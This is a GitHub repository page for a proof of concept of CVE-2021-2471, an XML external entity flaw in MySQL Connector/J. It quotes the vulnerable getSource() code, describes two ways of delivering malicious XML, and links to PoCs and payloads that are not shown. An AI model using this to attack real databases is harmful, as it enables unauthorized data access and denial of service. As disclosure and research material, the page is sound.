Skip to content

DrunkenShells/CVE-2021-2471

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits

README.md

README.md

 
 

Test.java

Test.java

 
 

Repository files navigation

CVE-2021-2471 - XXE in MySQL Connector/J

Vulnerability in the MySQL Connectors product of Oracle MySQL (component: Connector/J). Supported versions that are affected are 8.0.26 and prior.
Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Connectors accessible data and unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Connectors.

Disclaimer:

This vulnerability was found by Xu Yuanzhen of Alibaba Cloud Security Team and Hongkun Chen of Alibaba.
This PoC is provided for research purposes. Do not use it to attack targets that you do not have explicit permission to exploit.

Vendor Disclosure:

The vendor's disclosure and fix for this vulnerability can be found here.

Proof Of Concept:

The XXE vulnerability consists of a XML containing malicious DTD Entities being received by a MysqlSQLXML component and is triggered when the getSource() function is called.

As seen in the code below from the mysql-connector-java-8.0.26.jar, when the DOMSource class is given as argument to the getSource() function, it exposes a DocumentBuilder in an unsafe way such that, if an attacker controls the content of the inputSource passed to the builder, he/she could leverage it for obtaining XXE:

public <T extends Source> T getSource(Class<T> clazz) throws SQLException {
        try {
            this.checkClosed();
            this.checkWorkingWithResult();
            InputSource reader;
            if (clazz != null && !clazz.equals(SAXSource.class)) {
                SQLException sqlEx;
                if (clazz.equals(DOMSource.class)) {
                    try {
                        DocumentBuilderFactory builderFactory = DocumentBuilderFactory.newInstance();
                        builderFactory.setNamespaceAware(true);
                        DocumentBuilder builder = builderFactory.newDocumentBuilder();
                        if (this.fromResultSet) {
                            inputSource = new InputSource(this.owningResultSet.getCharacterStream(this.columnIndexOfXml));
                        } else {
                            inputSource = new InputSource(new StringReader(this.stringRep));
                        }

                        return new DOMSource(builder.parse(inputSource));

There are 2 ways in which to pass the malicious XXE to the MysqlSQLXML:

  • Using the sqlxml.setString() function (if the attacker can call or propagate arbitrary input to the setString function)
  • Placing the XML in the DB and retrieving it via a result set using the resultSet.getSQLXML() function (if the attacker has write access to the DB, or can point the victim to an attacker-controlled database)

Additional Resources:

PoC XXE using sqlxml.setString()
PoC XXE using resultSet.getSQLXML()
Download vulnerable JAR
Other XXE Payloads

About

PoC for CVE-2021-2471 - XXE in MySQL Connector/J

Resources

Readme
Activity

Stars

4 stars

Watchers

1 watching

Forks

3 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages